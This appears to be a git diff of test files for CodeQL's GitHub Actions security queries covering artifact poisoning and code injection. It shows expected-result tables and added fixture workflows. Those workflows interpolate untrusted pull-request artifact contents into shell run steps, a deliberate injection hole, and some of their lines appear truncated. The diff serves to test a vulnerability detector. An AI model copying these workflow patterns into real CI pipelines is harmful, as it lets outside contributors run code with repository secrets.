.github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -665,11 +672,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -728,8 +735,10 @@ cfgNodes | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -808,7 +817,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -867,8 +876,10 @@ dfNodes | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -949,7 +960,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:40:74 | .github/workflows/poisonable_steps.yml@5:5:40:74 | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:41:23 | .github/workflows/poisonable_steps.yml@5:5:41:23 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | @@ -1008,8 +1019,10 @@ nodeLocations | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:9:40:74 | .github/workflows/poisonable_steps.yml@40:9:40:74 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:9:41:23 | .github/workflows/poisonable_steps.yml@41:9:41:23 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -1030,7 +1043,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | @@ -1052,6 +1065,10 @@ sources | jitterbit/get-changed-files | * | output.removed | filename | manual | | jitterbit/get-changed-files | * | output.renamed | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | | marocchino/on_artifact | * | output.* | artifact | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index 8475711949f8..5cf7bbd4e6bd 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -21,69 +21,8 @@ jobs: id: pr run: echo "::set-output name=id::$( - - - body-include: '' - number: ${{ steps.pr.outputs.id }} - - - name: The job failed - if: ${{ failure() }} - uses: actions-cool/maintain-one-comment@v1.2.1 - with: - token: ${{ secrets.GITHUB_TOKEN }} - body: | - 😭 Deploy PR Preview failed. - - - - - body-include: '' - number: ${{ steps.pr.outputs.id }} - - failed: - runs-on: ubuntu-latest - if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'failure' - steps: - - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - name: pr - - - name: save PR id - id: pr - run: echo "::set-output name=id::$( - - - body-include: '' - number: ${{ steps.pr.outputs.id }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml new file mode 100644 index 000000000000..633c45661e59 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml @@ -0,0 +1,23 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + # Save PR id to output + - name: Save artifact data + id: artifact + uses: juliangruber/read-file-action@v1 + with: + path: ./artifact.txt + - name: Use artifact + run: echo ${{ steps.artifact.outputs.contents }} + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml new file mode 100644 index 000000000000..92c4be4a9e82 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml @@ -0,0 +1,30 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - id: artifact + run: | + echo "::set-output name=pr_number::$( bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | @@ -13,13 +12,12 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | nodes -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | @@ -42,11 +40,12 @@ nodes | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | subpaths #select -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | @@ -58,3 +57,4 @@ subpaths | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 18ad272f8031..57d7ff9d64b0 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,7 +1,6 @@ edges -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | @@ -13,13 +12,12 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | nodes -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build 